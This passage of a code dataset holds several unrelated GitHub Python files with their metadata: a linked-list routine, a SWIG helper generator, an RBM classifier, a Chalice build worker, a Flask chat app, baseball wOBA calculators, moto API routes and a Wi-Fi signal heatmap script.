x:\n l1.next = head\n l1 = l1.next\n else:\n l2.next = head\n l2 = l2.next\n head = head.next\n\n l2.next = None # Avoiding cycles\n l1.next = h2.next # Connecting left and right\n return h1.next\n\n# Time Complexity: O(n)\n# Space Complexity: O(1)\n# Solution: https://www.youtube.com/watch?v=KT1iUciJr4g","repo_name":"garzeah/algorithms","sub_path":"linked_lists/partition_list.py","file_name":"partition_list.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30687650362","text":"file = \"../_ser/lininteg.py\"\n\nout = [\"namespace mfem {\"]\nfid = open(file, 'r')\nfor line in fid.readlines():\n if line.startswith(\"class\"):\n cname = (line.split(' ')[1]).split('(')[0]\n \n if line.startswith(\" def __init__\"):\n pp = \"\"\n if line.find(\"*args\") != -1:\n pp = \" self._coeff = args\"\n elif line.find(\", QG\") != -1:\n pp = \" self._coeff = QG\"\n elif line.find(\", QF)\") != -1:\n pp = \" self._coeff = QF\"\n elif line.find(\", F)\") != -1:\n pp = \" self._coeff = F\"\n elif line.find(\", f, s=1.0, ir=None)\") != -1:\n pp = \" self._coeff = (f, ir)\"\n elif line.find(\", uD_, lambda_, mu_, alpha_, kappa_)\") != -1:\n pp = \" self._coeff = uD_\"\n elif line.find(\"(self)\") != -1:\n pass\n else:\n print(cname)\n print(line)\n assert False, \"No recipt for this pattern \"\n if pp != \"\":\n out.append(\"%pythonappend \" + cname + \"::\" + cname + \" %{\")\n out.append(pp)\n out.append(\"%}\")\nfid.close()\nout.append(\"}\")\n\nfid = open(\"lininteg_ext.i\", \"w\")\nfid.write(\"\\n\".join(out))\nfid.close()\n\n","repo_name":"mfem/PyMFEM","sub_path":"mfem/common/generate_lininteg_ext.py","file_name":"generate_lininteg_ext.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"48"} +{"seq_id":"25398206447","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets, metrics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.neural_network import BernoulliRBM\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.pipeline import Pipeline\n\ndatabase = datasets.load_digits()\npredictors = np.asarray(database.data, 'float32')\nclasse = database.target\n\nnormalizer = MinMaxScaler(feature_range = (0,1))\npredictors = normalizer.fit_transform(predictors)\n\ntrain_predictors, test_predictors, train_class, test_class = train_test_split(predictors,\n classe,\n test_size = 0.2,\n random_state = 0)\n\nrbm = BernoulliRBM(random_state = 0)\nrbm.n_iter = 25\nrbm.n_components = 50\nnaive_rbm = GaussianNB()\nclassifier_rbm = Pipeline(steps = [('rbm', rbm), ('naive', naive_rbm)])\nclassifier_rbm.fit(train_predictors, train_class)\n\nplt.figure(figsize=(20, 20))\nfor i, comp in enumerate(rbm.components_):\n plt.subplot(10, 10, i+1)\n plt.imshow(comp.reshape((8,8)), cmap=plt.cm.gray_r)\n plt.xticks(())\n plt.yticks(())\nplt.show()\n\npredictions_rbm = classifier_rbm.predict(test_predictors)\nprecision_rbm = metrics.accuracy_score(predictions_rbm, test_class)\n\nnaive_simple = GaussianNB()\nnaive_simple.fit(train_predictors, train_class)\npredictions_naive = naive_simple.predict(test_predictors)\nprecision_naive = metrics.accuracy_score(predictions_naive, test_class)","repo_name":"Chbmleao/Deep-Learning-with-Python","sub_path":"RestrictedBoltzmannMachines/image_dimension_reduction.py","file_name":"image_dimension_reduction.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6688468209","text":"import os\nimport re\nfrom shutil import make_archive\nfrom aste.aste import BuildError, NonBuildError\nfrom aste.workers.workers import BaseWorker, BuildWorker, accept, raiseNonBuildError\nfrom aste.workers.mixins import MercurialMixin\nimport aste.workers.svnworkers\nimport aste.utils.errorhandling as errorhandling\n\nclass CheckoutWorker(MercurialMixin, BaseWorker):\n \"\"\"Checks out the sources of Chalice. The build data is stored in the\n environment using the corresponding method name as the key, e.g.\n in ``env.data[CheckoutWorker.DID]['getChalice']``.\n \"\"\"\n\n # That DID is hard-coded into reporting/reporting.py in order to generate\n # parts of the report, hence we use the same here.\n DID = aste.workers.svnworkers.CheckoutWorker.DID\n\n def __init__(self, env):\n super(CheckoutWorker, self).__init__(env)\n if (not self.DID in self.env.data):\n self.env.data[self.DID] = {}\n\n @errorhandling.add_context(\"Checking out Chalice from CodePlex\")\n def getChalice(self):\n \"\"\"Downloads the Chalice sources from ``HG.Chalice`` to\n ``Paths.Chalice``.\n \"\"\"\n \n result = self.hg_get_source(self.cfg.HG.Chalice, self.cfg.Paths.Chalice, \"Chalice\", self.cfg.HG.Update)\n \n self.env.data[self.DID]['getChalice'] = result\n\n self.noteSummary('Chalice revision: %s' % result['last_changed_revision'],\n prefix='# ')\n\n\ndef _raiseBuildError(match):\n raise BuildError(\"Aborted due to error: \" + match)\n\nclass ChaliceMatchingWorker(BuildWorker):\n def __init__(self, env, project_name):\n super(ChaliceMatchingWorker, self).__init__(env, project_name)\n \n matchers = {\n 'build': [\n (\n ['(\\[warn\\] .+:\\d+: .*)'],\n # ['(?m)^(\\[warn\\] .+:\\d+: .*)$'],\n [accept],\n [str]\n ), (\n ['(\\[error\\] .+:\\d+: .*)'],\n # ['(?m)^(\\[error\\] .+:\\d+: .*)$'],\n [_raiseBuildError], # Python 2.7: Can't raise an error inside a lambda expression, hence this method call\n [str]\n )\n ],\n 'envfatals': [\n (\n ['(java.io.IOException: .*)'],\n [raiseNonBuildError], [lambda match: match[0]]\n ), (\n ['The process cannot access the file because it is being used by another process'],\n [raiseNonBuildError], [lambda match: match[0]]\n )\n ]\n }\n \n def _matchDefaults(self, output):\n \"\"\"Matches the ``output`` with the matcher groups\n *envfatals* and *build*, and returns the matches in a single list.\n \"\"\"\n \n # output = _mock_compile_output_warnings\n # Mock output is defined at the end of this file\n \n matches = self.matchNamedGroup('envfatals', output)\n matches += self.matchNamedGroup('build', output)\n\n return matches\n\n\nclass ChaliceWorker(ChaliceMatchingWorker):\n \"\"\"Implements the steps necessary to build and test Chalice.\n \"\"\"\n\n def __init__(self, env):\n super(ChaliceWorker, self).__init__(env, 'Chalice')\n\n # def set_version_number(self):\n # \"\"\"\n # .. todo::\n # Give Chalice a build version/timestamp that makes it possible to\n # identify and order Chalice builds.\n # \"\"\"\n \n def checkoutChalice(self):\n checkoutWorker = CheckoutWorker(self.env)\n checkoutWorker.getChalice()\n\n def __runSbtBasedTool(self, sbtCmd):\n cmdSetIvyHome = \"set JAVA_OPTS=-Dsbt.ivy.home=\" + self.cfg.Paths.Sbt.IvyHome\n cmd = 'cmd /c \"(%s) && (%s)\"' % (cmdSetIvyHome, sbtCmd)\n \n # Execute command and match against error/success patterns. These patterns should\n # include Sbt errors and failures and Java exceptions.\n return self._runDefaultBuildStep(cmd)\n \n def buildChalice(self):\n self.cd(self.cfg.Paths.Chalice + \"\\\\Chalice\")\n \n # cmdSetIvyHome = \"set JAVA_OPTS=-Dsbt.ivy.home=\" + self.cfg.Paths.Sbt.IvyHome\n \n cmd = \"sbt.bat clean compile\"\n \n # cmd = 'cmd /c \"(%s) && (%s)\"' % (cmdSetIvyHome, cmdSbt)\n # cmd = 'cmd /c \"%s\"' % (cmdSbt)\n # cmd = \"%s\" % (cmdSbt)\n \n # cmd = 'cmd.exe /C rem'\n # Noop cmd, for example for the case that \n # ChaliceMatchingWorker._matchDefaults overwrites the received\n # output with mock output.\n \n # self._runDefaultBuildStep(cmd)\n self.__runSbtBasedTool(cmd)\n\n def testChalice(self):\n # Matcher detecting a failed test case. The match group (*.?) captures\n # the name of the failing test case.\n failMatcher = [(['(?m)^FAIL: (.*?)$', '(?m)^ERROR: (.*?)$'], [accept], [str])]\n successMatcher = [(['(?m)^OK: (.*?)$'], [accept], [str])]\n \n summaryMatcher = [(\n ['(?:SUMMARY: completed (\\d+) tests successfully.)|(?:SUMMARY: \\d+ of (\\d+) tests failed.)'],\n [accept],\n [lambda match: int(next((e for e in match if e.isdigit()), None))]\n )]\n \n self.cd(self.cfg.Paths.Chalice + \"\\\\Chalice\\\\tests\")\n \n cmd = \"runalltests.bat /boogie:%s /boogieOpt:z3exe:%s\" % (self.cfg.Apps.Boogie, self.cfg.Apps.Z3)\n \n # result = {'output': mock_test_output_fails_oks}\n # Mock output is defined at the end of this file\n\n result = self.run(cmd)\n \n failMatches = self.matchGroup(failMatcher, result['output'])\n successMatches = self.matchGroup(successMatcher, result['output'])\n summaryMatches = self.matchGroup(summaryMatcher, result['output'])\n \n tests = summaryMatches[0]\n \n self.noteSummary(\"%s out of %s test(s) failed\" % (len(failMatches), tests))\n\n if len(failMatches) > 0:\n self.logSummary(str(failMatches))\n\n self.project_data['tests']['failed'] = failMatches\n \n def check_z3_version(self, required_version_str):\n \"\"\"\n .. todo:: Accepts only one Z3 version, use range min-max instead.\n \"\"\"\n\n cmd = \"%s /version\" % self.cfg.Apps.Z3\n result = self.runSafely(cmd)\n \n match = re.match('Z3 version (\\d+\\.?\\d*)', result['output'])\n found_version_str = match.group(1)\n \n if found_version_str != required_version_str:\n msg = \"Expected Z3 %s but found: %s\" % (required_version_str, found_version_str)\n self.abort(msg, command=cmd, returncode=result['returncode'],\n output=result['output'], exception_class=NonBuildError)\n\n def zip_binaries(self, filename):\n self.cd(self.cfg.Paths.Chalice + \"\\\\Chalice\\\\scripts\\\\create_release\")\n cmd = \"create_release.bat\"\n # self.runSafely(cmd)\n self.__runSbtBasedTool(cmd)\n # make_archive expects an archive name without a filename extension.\n archive_name = os.path.splitext(os.path.abspath(filename))[0]\n root_dir = os.path.abspath(\"release\")\n make_archive(archive_name, 'zip', root_dir)\n \n \n# _mock_compile_output_warnings = \"\"\"\n# [info] Set current project to default-c3764d (in build file:/C:/Temp/aste/Boogie/Chalice/)\n# [success] Total time: 1 s, completed 17.08.2011 15:37:00\n# [info] Updating {file:/C:/Temp/aste/Boogie/Chalice/}default-c3764d...\n# [info] Done updating.\n# [info] Compiling 11 Scala sources to C:\\Temp\\aste\\Boogie\\Chalice\\target\\scala-2.8.1.final\\classes...\n# [warn] C:\\Temp\\aste\\Boogie\\Chalice\\src\\main\\scala\\Ast.scala:77: case class `class SeqClass' has case class ancestor `class Class'. This has been deprecated for unduly complicating both usage and implementation. You should instead use extractors for pattern matching on non-leaf nodes.\n# [warn] sealed case class SeqClass(parameter: Class) extends Class(\"seq\", List(parameter), \"default\", Nil) {\n# [warn] ^\n# [warn] C:\\Temp\\aste\\Boogie\\Chalice\\src\\main\\scala\\Ast.scala:111: case class `class TokenClass' has case class ancestor `class Class'. This has been deprecated for unduly complicating both usage and implementation. You should instead use extractors for pattern matching on non-leaf nodes.\n# [warn] case class TokenClass(c: Type, m: String) extends Class(\"token\", Nil, \"default\", List(\n# [warn] ^\n# [warn] C:\\Temp\\aste\\Boogie\\Chalice\\src\\main\\scala\\Ast.scala:121: case class `class ChannelClass' has case class ancestor `class Class'. This has been deprecated for unduly complicating both usage and implementation. You should instead use extractors for pattern matching on non-leaf nodes.\n# [warn] case class ChannelClass(ch: Channel) extends Class(ch.id, Nil, \"default\", Nil) {\n# [warn] ^\n# [warn] C:\\Temp\\aste\\Boogie\\Chalice\\src\\main\\scala\\Ast.scala:141: case class `class TokenType' has case class ancestor `class Type'. This has been deprecated for unduly complicating both usage and implementation. You should instead use extractors for pattern matching on non-leaf nodes.\n# [warn] sealed case class TokenType(C: Type, m: String) extends Type(\"token\", Nil) { // denotes the use of a type\n# [warn] ^\n# [warn] C:\\Temp\\aste\\Boogie\\Chalice\\src\\main\\scala\\Ast.scala:168: case class `class SpecialField' has case class ancestor `class Field'. This has been deprecated for unduly complicating both usage and implementation. You should instead use extractors for pattern matching on non-leaf nodes.\n# [warn] case class SpecialField(name: String, tp: Type, hidden: Boolean) extends Field(name, tp, false) { // direct assignments are not allowed to a SpecialField\n# [warn] ^\n# [warn] C:\\Temp\\aste\\Boogie\\Chalice\\src\\main\\scala\\Ast.scala:212: case class `class SpecialVariable' has case class ancestor `class Variable'. This has been deprecated for unduly complicating both usage and implementation. You should instead use extractors for pattern matching on non-leaf nodes.\n# [warn] case class SpecialVariable(name: String, typ: Type) extends Variable(name, typ, false, false) {\n# [warn] ^\n# [warn] 6 warnings found\n# [success] Total time: 49 s, completed 17.08.2011 15:37:50\n# \"\"\"\n\n# mock_test_output_fails_oks = \"\"\"\n# Running tests in examples ...\n# ------------------------------------------------------\n# FAIL: AssociationList.chalice\n# FAIL: BackgroundComputation.chalice\n# FAIL: cell.chalice\n# FAIL: CopyLessMessagePassing-with-ack.chalice\n# FAIL: CopyLessMessagePassing-with-ack2.chalice\n# FAIL: CopyLessMessagePassing.chalice\n# FAIL: dining-philosophers.chalice\n# FAIL: FictionallyDisjointCells.chalice\n# FAIL: ForkJoin.chalice\n# FAIL: HandOverHand.chalice\n# FAIL: iterator.chalice\n# FAIL: iterator2.chalice\n# FAIL: linkedlist.chalice\n# FAIL: OwickiGries.chalice\n# FAIL: PetersonsAlgorithm.chalice\n# FAIL: ProdConsChannel.chalice\n# FAIL: producer-consumer.chalice\n# FAIL: RockBand.chalice\n# FAIL: Sieve.chalice\n# FAIL: Solver.chalice\n# FAIL: swap.chalice\n# FAIL: TreeOfWorker.chalice\n# FAIL: UnboundedThreads.chalice\n# ------------------------------------------------------\n# Running tests in permission-model ...\n# ------------------------------------------------------\n# FAIL: basic.chalice\n# FAIL: channels.chalice\n# FAIL: locks.chalice\n# FAIL: peculiar.chalice\n# OK: permarith_parser.chalice\n# FAIL: permission_arithmetic.chalice\n# FAIL: predicates.chalice\n# FAIL: predicate_error1.chalice\n# FAIL: predicate_error2.chalice\n# FAIL: predicate_error3.chalice\n# FAIL: predicate_error4.chalice\n# FAIL: scaling.chalice\n# FAIL: sequences.chalice\n# ------------------------------------------------------\n# Running tests in general-tests ...\n# ------------------------------------------------------\n# FAIL: cell-defaults.chalice\n# FAIL: counter.chalice\n# FAIL: ImplicitLocals.chalice\n# FAIL: LoopLockChange.chalice\n# OK: prog0.chalice\n# FAIL: prog1.chalice\n# FAIL: prog2.chalice\n# FAIL: prog3.chalice\n# FAIL: prog4.chalice\n# FAIL: quantifiers.chalice\n# FAIL: RockBand-automagic.chalice\n# FAIL: SmokeTestTest.chalice\n# OK: VariationsOfProdConsChannel.chalice\n# ------------------------------------------------------\n# Running tests in regressions ...\n# ------------------------------------------------------\n# OK: workitem-10147.chalice\n# FAIL: workitem-10190.chalice\n# FAIL: workitem-10192.chalice\n# FAIL: workitem-10194.chalice\n# FAIL: workitem-10195.chalice\n# FAIL: workitem-10196.chalice\n# FAIL: workitem-10197.chalice\n# FAIL: workitem-10198.chalice\n# FAIL: workitem-10199.chalice\n# FAIL: workitem-10200.chalice\n# FAIL: workitem-8234.chalice\n# FAIL: workitem-8236.chalice\n# FAIL: workitem-9978.chalice\n# ------------------------------------------------------\n# SUMMARY: 58 of 62 tests failed.\n# \"\"\"","repo_name":"ggrov/tacny","sub_path":"boogie-partners/Aste/aste/workers/chaliceworkers.py","file_name":"chaliceworkers.py","file_ext":"py","file_size_in_byte":12749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"25655063785","text":"line = input()\nnumbers = line.split(\" \")\nn = int(numbers[0])\nmax = int(numbers[1])\n\nline = input()\nlList = line.split(\" \")\nd, count = 0, 1\nfor i in range(n):\n d += int(lList[i])\n if d <= max:\n count += 1\n\nprint(count)","repo_name":"yuly3/atcoder","sub_path":"ABC/ABC130/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29442091510","text":"import os\nfrom time import localtime, strftime\nfrom flask import Flask, render_template, redirect, url_for, flash, request, session, jsonify\nfrom flask_socketio import SocketIO, emit, send, join_room, leave_room\nfrom werkzeug.utils import secure_filename\nfrom flask import send_from_directory\n\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = 'Super_secret_key'\nsocketio = SocketIO(app)\n# Create predefined rooms\nROOMS = []\nmesage = {}\n\nUPLOAD_FOLDER = './static/uploads'\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n# app.config['WTF_CSRF_SECRET_KEY'] = \"b'f\\xfa\\x8b{X\\x8b\\x9eM\\x83l\\x19\\xad\\x84\\x08\\xaa\"\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/upload-file', methods=['POST'])\ndef upload_file():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(url_for('index'))\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(url_for('index'))\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return jsonify({'filename': filename})\n\n@app.route('/uploads/')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index():\n login = 'loggedout'\n username = ''\n if 'username' in session:\n login = 'loggedin'\n username = session['username']\n else:\n return redirect(url_for('login'))\n\n return render_template('chat.html', username=username, login=login, ROOMS=ROOMS)\n\n\n@app.route('/get-rooms', methods=['POST'])\ndef get_rooms():\n if 'username' not in session:\n flash(\"Please login\", 'danger')\n return redirect(url_for('login'))\n\n if request.method == \"GET\":\n return jsonify({'rooms': ROOMS})\n else:\n room = request.form['room'].lower()\n\n if room not in ROOMS:\n ROOMS.append(room)\n mesage[room] = []\n print('PPPPPPPPPPPPPPPPPPPPPP')\n print(ROOMS)\n print('PPPPPPPPPPPPPPPPPPPPPP')\n\n return jsonify({'success': 'Room created'})\n\n@app.route('/get-messages', methods=['POST'])\ndef get_messages():\n if 'username' not in session:\n flash(\"Please login\", 'danger')\n return redirect(url_for('login'))\n\n text = []\n room = request.form['room'].lower()\n\n if room in mesage:\n return jsonify({'messages': mesage[room]})\n\n print(\"%%%%%%%%%%%%%%%%%\")\n # print(text)\n print(mesage[room])\n print(\"%%%%%%%%%%%%%%%%%\")\n return jsonify({'messages': []})\n\n\n@app.route('/login',methods=['GET','POST'])\ndef login():\n if request.method=='POST':\n session['username']=request.form['username']\n return redirect(url_for('index'))\n return render_template('login.html')\n\n\n@app.route('/logout')\ndef logout():\n session.pop('username',None)\n flash(\"You have logged out successfuly\", \"success\")\n return redirect(url_for('login'))\n\n\n# server-side event handler to recivie/send messages\n@socketio.on('message')\ndef message(data):\n x = data\n x['time_stamp'] = strftime('%b-%d %I:%M%p', localtime())\n if data['room'] in mesage:\n if len(mesage[data['room'].lower()]) < 5:\n mesage[data['room'].lower()].append(x)\n else:\n mesage[data['room'].lower()].pop(0)\n mesage[data['room'].lower()].append(x)\n\n send({'msg': data['msg'], 'username': data['username'],\n 'time_stamp': strftime('%b-%d %I:%M%p', localtime())}, room=data['room'].lower())\n\n\n# server-side event handler to join the room\n@socketio.on('join')\ndef join(data):\n if ROOMS:\n join_room(data['room'])\n send({\"msg\": data['username'] + \" has joined the \" + data['room'] + \" room.\"}, room=data['room'])\n\n\n# server-side event handler to leave the room\n@socketio.on('leave')\ndef leave(data):\n leave_room(data['room'])\n send({\"msg\": data['username'] + \" has left the \" + data['room'] + \" room.\"}, room=data['room'])\n\n\n@socketio.on(\"create room\")\ndef create(data):\n room = data[\"room\"]\n join_room(room)\n emit(\"creation\", {\"room\": room}, broadcast=True)\n\n\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n # app.run(host='0.0.0.0', port=port, debug=True)\n socketio.run(app, host='0.0.0.0', port=port)\n","repo_name":"MotazBellah/sc50p2","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28651618876","text":"import parsestats\nimport alchemy\nimport calculateleaguewidestats\nimport linear_weights_constants\n\ndef create_league(league_name):\n players = parsestats.parse_data(league_name + '.csv')\n if players == False:\n return False\n\n p = alchemy.Players()\n for player in players:\n p.writeData(player, league_name)\n\n return True\n\n\ndef update_player_raa(players, constants):\n for player in players:\n outcomes = calculateleaguewidestats.create_player_outcomes(player)\n player.RAA = linear_weights_constants.calculate_raa(constants, outcomes)\n alchemy.update_player_RAA(player)\n\ndef get_woba_weights(linear_weights):\n \"\"\"Function to convert basic linear weights to linear weights for calculating wOBA\"\"\"\n o = -1 * linear_weights[\"O\"]\n return {\"W\": linear_weights[\"W\"] + o, \"S\": linear_weights[\"S\"] + o, \"D\": linear_weights[\"D\"] + o, \"T\": linear_weights[\"T\"] + o, \"H\": linear_weights[\"H\"] + o}\n\ndef get_league_woba(woba_weights, league_name):\n \"\"\"Gets the league wide wOBA without weighting it in order to normalize it\"\"\"\n # probabilities = use_database.get_league_stats(table_name)\n # linear_weights = linear_weights_constants.get_linear_weights_constants(10e-8, probabilities)\n # woba_weights = get_woba_weights(linear_weights)\n\n players = alchemy.Players()\n\n output = players.readLeagueWideStats(league_name)\n \n\n \n return (output[1] * woba_weights[\"S\"] + output[2] * woba_weights[\"D\"] + output[3] * woba_weights[\"T\"] + output[4] * woba_weights[\"H\"] + output[5] * woba_weights[\"W\"]) / (output[0] + output[5])\n\n\ndef get_woba_scale(league_woba, desired_average = .300):\n \"\"\"Returns the wOBA scale to multiply unweighted player wOBAs by\"\"\"\n return desired_average / league_woba\n\ndef calculate_player_woba(player_outcomes, woba_weights, woba_scale):\n \"\"\"Calculates the weighted on base average for a player\"\"\"\n total_pa = player_outcomes[\"W\"] + player_outcomes[\"S\"] + player_outcomes[\"D\"] + player_outcomes[\"T\"] + player_outcomes[\"H\"] + player_outcomes[\"O\"]\n # players with no plate appearances will be listed to have a 0 woba\n if total_pa == 0:\n return 0\n unscaled_woba = (player_outcomes[\"W\"] * woba_weights[\"W\"] + player_outcomes[\"S\"] * woba_weights[\"S\"] + player_outcomes[\"D\"] * woba_weights[\"D\"] + player_outcomes[\"T\"] * woba_weights[\"T\"] + player_outcomes[\"H\"] * woba_weights[\"H\"]) / total_pa\n return unscaled_woba * woba_scale\n\ndef update_player_woba(players, constants, table_name):\n \"\"\"Updates wOBA for all players in a table\"\"\"\n # players = use_database.get_all_players(table_name)\n # probabilities = use_database.get_league_stats(table_name)\n # constants = linear_weights_constants.get_linear_weights_constants(10e-8, probabilities)\n woba_weights = get_woba_weights(constants)\n league_woba = get_league_woba(woba_weights, table_name)\n woba_scale = get_woba_scale(league_woba)\n\n for player in players:\n outcomes = calculateleaguewidestats.create_player_outcomes(player)\n player.wOBA = calculate_player_woba(outcomes, woba_weights, woba_scale)\n alchemy.update_player_wOBA(player)\n\ndef overwrite_league(league_name):\n alchemy.delete_league(league_name)\n league_success = create_league(league_name)\n if not league_success:\n return False\n\n update_all_stats(league_name)\n return True\n\ndef update_all_stats(table_name):\n players = alchemy.get_filtered_sorted_players(table_name)\n probabilities = alchemy.get_league_stats(table_name)\n constants = linear_weights_constants.get_linear_weights_constants(10e-8, probabilities)\n\n update_player_raa(players, constants)\n update_player_woba(players, constants, table_name)\n \n \nif __name__ == \"__main__\":\n overwrite_league(\"rock_2022\")","repo_name":"Joshua6h/wOBA-calculator","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32304079431","text":"from .responses import MotoAPIResponse\nfrom .recorder.responses import RecorderResponse\n\nurl_bases = [\"https?://motoapi.amazonaws.com\"]\n\nresponse_instance = MotoAPIResponse()\nrecorder_response = RecorderResponse()\n\nurl_paths = {\n \"{0}/moto-api/$\": response_instance.dashboard,\n \"{0}/moto-api/data.json\": response_instance.model_data,\n \"{0}/moto-api/reset\": response_instance.reset_response,\n \"{0}/moto-api/reset-auth\": response_instance.reset_auth_response,\n \"{0}/moto-api/seed\": response_instance.seed,\n \"{0}/moto-api/static/athena/query-results\": response_instance.set_athena_result,\n \"{0}/moto-api/static/inspector2/findings-results\": response_instance.set_inspector2_findings_result,\n \"{0}/moto-api/static/sagemaker/endpoint-results\": response_instance.set_sagemaker_result,\n \"{0}/moto-api/static/rds-data/statement-results\": response_instance.set_rds_data_result,\n \"{0}/moto-api/state-manager/get-transition\": response_instance.get_transition,\n \"{0}/moto-api/state-manager/set-transition\": response_instance.set_transition,\n \"{0}/moto-api/state-manager/unset-transition\": response_instance.unset_transition,\n \"{0}/moto-api/recorder/reset-recording\": recorder_response.reset_recording,\n \"{0}/moto-api/recorder/start-recording\": recorder_response.start_recording,\n \"{0}/moto-api/recorder/stop-recording\": recorder_response.stop_recording,\n \"{0}/moto-api/recorder/upload-recording\": recorder_response.upload_recording,\n \"{0}/moto-api/recorder/download-recording\": recorder_response.download_recording,\n \"{0}/moto-api/recorder/replay-recording\": recorder_response.replay_recording,\n}\n","repo_name":"getmoto/moto","sub_path":"moto/moto_api/_internal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":7174,"dataset":"github-code","pt":"48"} +{"seq_id":"73022469585","text":"import pandas as pd\r\nimport numpy as np\r\nimport folium\r\nfrom folium.plugins import HeatMap\r\nimport json\r\nimport subprocess\r\n\r\ndef mapa_de_calor():\r\n subprocess.call('cls', shell=True)\r\n # Parsear el JSON\r\n #data = json.loads(json_data)\r\n # Leer datos del archivo JSON\r\n with open('informacion.json') as file:\r\n data = json.load(file)\r\n\r\n \r\n # Obtener todos los SSIDs y sus correspondientes \"bssid 1\" presentes en el JSON\r\n ssids = []\r\n for entry in data:\r\n redes_wifi = entry[\"redes_wifi\"]\r\n for red_wifi in redes_wifi:\r\n if \"ssid\" in red_wifi and \"bssid 1\" in red_wifi:\r\n ssid = red_wifi[\"ssid\"]\r\n bssid = red_wifi[\"bssid 1\"]\r\n ssids.append((ssid, bssid))\r\n\r\n # Eliminar duplicados y mostrar los SSIDs numerados con su \"bssid 1\" entre paréntesis\r\n print(\"\\n\\nSSID obtenidos\\n---\\n\")\r\n ssids_unicos = list(set(ssids))\r\n for i, (ssid, bssid) in enumerate(ssids_unicos, start=1):\r\n print(f\"{i}. {ssid} ({bssid})\")\r\n\r\n # Solicitar al usuario el número del SSID seleccionado\r\n opcion = int(input(\"\\nSeleccione el número del SSID que desea seguir: \"))\r\n ssid_seleccionado = ssids_unicos[opcion - 1][0]\r\n print(f\"\\nEl SSID Seleccionado es: {ssid_seleccionado}\\n\")\r\n output = input(\"Nombre del output(Default map): \")\r\n if output == \"\":\r\n output = \"map\"\r\n\r\n # Obtener coordenadas y fuerza de señal\r\n coords = []\r\n signal_strengths = []\r\n coords_filtered = []\r\n signal_strengths_filtered = []\r\n\r\n\r\n for entry in data:\r\n ubicacion = entry[\"ubicacion\"]\r\n redes_wifi = entry[\"redes_wifi\"]\r\n found_ssid = False\r\n \r\n for red_wifi in redes_wifi:\r\n if \"ssid\" in red_wifi and red_wifi[\"ssid\"] == ssid_seleccionado:\r\n found_ssid = True\r\n if \"seal\" in red_wifi:\r\n seal = red_wifi[\"seal\"]\r\n signal_strength = int(seal.strip(\"%\"))\r\n \r\n if signal_strength < 21:\r\n signal_strengths_filtered.append(signal_strength)\r\n else:\r\n signal_strengths_filtered.append(min(signal_strength + 49, 100))\r\n \r\n coords_filtered.append(ubicacion)\r\n \r\n if not found_ssid:\r\n coords_filtered.append(None)\r\n signal_strengths_filtered.append(None)\r\n \r\n coords_filtered.append([90,90])\r\n signal_strengths_filtered.append(0)\r\n coords_filtered.append([-90,90])\r\n signal_strengths_filtered.append(100)\r\n\r\n # Crear el DataFrame\r\n df = pd.DataFrame({'latitud': [coord[0] if coord is not None else None for coord in coords_filtered],\r\n 'longitud': [coord[1] if coord is not None else None for coord in coords_filtered],\r\n 'fuerza de señal': signal_strengths_filtered})\r\n \r\n # Eliminar filas con valores NaN\r\n df.dropna(subset=['latitud', 'longitud', 'fuerza de señal'], inplace=True)\r\n\r\n\r\n # Filtrar filas duplicadas y con diferencias menores a 0.000050 en latitud o longitud (No funciona correctamente las elimina por completo)\r\n #df = df.groupby(['latitud', 'longitud']).filter(lambda x: (x.shape[0] == 1) or\r\n # ((x['latitud'].max() - x['latitud'].min()) > 0.000050) or\r\n # ((x['longitud'].max() - x['longitud'].min()) > 0.000050))\r\n \r\n\r\n # Eliminar filas duplicadas basadas en latitud y longitud\r\n df.drop_duplicates(subset=['latitud', 'longitud'], keep='first', inplace=True)\r\n\r\n\r\n # Crear el mapa de calor\r\n mapa = folium.Map(location=[np.mean(df['latitud'][:-2]), np.mean(df['longitud'][:-2])], zoom_start=100)\r\n\r\n capa_calor = folium.FeatureGroup(name='Mapa de calor')\r\n capa_calor.add_child(HeatMap(data=df[['latitud', 'longitud', 'fuerza de señal']].values.tolist(), radius=15))\r\n mapa.add_child(capa_calor)\r\n\r\n leyenda = folium.features.GeoJson(\r\n data={\r\n 'type': 'FeatureCollection',\r\n 'features': [{\r\n 'type': 'Feature',\r\n 'properties': {\r\n 'name': 'Leyenda',\r\n 'description': 'Fuerza de señal'\r\n },\r\n 'geometry': {\r\n 'type': 'Point',\r\n 'coordinates': [np.mean(df['latitud']), np.mean(df['longitud'])]\r\n }\r\n 